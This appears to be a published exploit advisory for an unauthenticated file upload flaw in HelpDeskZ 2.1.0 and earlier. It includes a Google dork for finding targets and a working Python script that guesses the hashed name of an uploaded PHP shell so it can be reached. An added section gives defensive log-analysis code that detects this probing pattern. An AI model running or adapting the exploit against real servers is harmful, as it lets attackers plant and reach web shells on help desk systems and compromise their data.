HelpDeskZ 2.1.0 Unauthenticated Arbitrary File Upload

2017.08.19
Credit: Dyar Sahdi
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: HelpDeskZ 2.1.0 Unauthenticated Arbitrary File Upload
# Google Dork: intext:"Help Desk Software by HelpDeskZ"
# Exploit Author: Dyar Sahdi
# Vendor Homepage: https://www.facebook.com/Dyar.Sahdi.Linux
# Version: <= v2.1.0
# Tested on: Win7, Linux, Win10, Win XP

------------------------------------------
Exploit Tool: https://github.com/evolutionscript/HelpDeskZ-1.0/tree/006662bb856e126a38f2bb76df44a2e4e3d37350
------------------------------------------

Tools Link
------------------
1- https://ghostbin.com/paste/ry5j7

------------------------------------------
Steps to reproduce:
http://localhost/helpdeskz/?v=submit_ticket&action=displayForm
------------------------------------------

Exploit.py
-------------------------
import hashlib
import sys
import time

import requests

print('Helpdeskz v1.0.2 - Unauthenticated shell upload exploit')

if len(sys.argv) < 3:
    print("Usage: {} [baseUrl] [nameOfUploadedFile]".format(sys.argv[0]))
    sys.exit(1)

helpdeskzBaseUrl = sys.argv[1]
fileName = sys.argv[2]
currentTime = int(time.time())

# The stored file is named md5(<original file name><upload unix time>).php,
# so walk back over the last 300 seconds and probe each candidate name.
for x in range(0, 300):
    plaintext = fileName + str(currentTime - x)
    md5hash = hashlib.md5(plaintext.encode()).hexdigest()
    url = helpdeskzBaseUrl + md5hash + '.php'
    response = requests.head(url)
    if response.status_code == 200:
        print("found!")
        print(url)
        sys.exit(0)

print("Sorry, I did not find anything")
-----------------------------------------

Location: exploit.py http://localhost/helpdeskz/ phpshell.php

+++++++++++++++++++++++++++++++++++
Kurdistan Is Not Iraq
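Added defender's note, not part of the advisory: because the stored name is md5(file name + upload time).php, locating the file takes at most a few hundred guesses, and those guesses leave a burst of HEAD/GET requests for 32-hex-character .php names, mostly answered 404, in the web server access log. The example below (written for this page, not HelpDeskZ code) scans combined-format access log lines for that pattern; the upload directory, client addresses and log lines are constructed assumptions.

```python
import hashlib
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Combined-format access log line: client, timestamp, method, path, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# Stored uploads are named md5(<name><unix time>).php, so guesses show up as
# requests for 32-hex-character .php files; the directory is not fixed here.
PROBE_RE = re.compile(r'/[0-9a-f]{32}\.php$')
TS_FMT = '%d/%b/%Y:%H:%M:%S %z'

def parse_line(line):
    """Return (ip, datetime, method, path, status), or None if not a log line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return (m.group('ip'), datetime.strptime(m.group('ts'), TS_FMT),
            m.group('method'), m.group('path'), int(m.group('status')))

def detect_probing(lines, threshold=20, window=timedelta(minutes=5)):
    """ip -> (max 404 probes in one window, first probe path that returned 200)."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and PROBE_RE.search(rec[3]):
            per_ip[rec[0]].append(rec)
    alerts = {}
    for ip, recs in per_ip.items():
        recs.sort(key=lambda r: r[1])
        best, start = 0, 0
        for end in range(len(recs)):          # sliding time window over probes
            while recs[end][1] - recs[start][1] > window:
                start += 1
            best = max(best, sum(1 for r in recs[start:end + 1] if r[4] == 404))
        if best >= threshold:
            hit = next((r[3] for r in recs if r[4] == 200), None)
            alerts[ip] = (best, hit)
    return alerts

def sample_access_log():
    """Constructed sample: one ordinary visitor, one client guessing 24 wrong names."""
    base = datetime(2017, 8, 19, 10, 0, 0, tzinfo=timezone.utc)
    lines = ['198.51.100.7 - - [%s] "GET /helpdeskz/ HTTP/1.1" 200 5120'
             % base.strftime(TS_FMT)]
    for i in range(25):                       # assumed upload directory below
        name = hashlib.md5(('guess%d' % i).encode()).hexdigest()
        stamp = (base + timedelta(seconds=i)).strftime(TS_FMT)
        lines.append('203.0.113.5 - - [%s] "HEAD /helpdeskz/uploads/tickets/%s.php HTTP/1.1" %d -'
                     % (stamp, name, 404 if i < 24 else 200))
    return lines
```

A 200 on one of the probed names after a run of 404s is the strongest signal, since it marks the upload the client was looking for.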

Copyright 2017, cxsecurity.com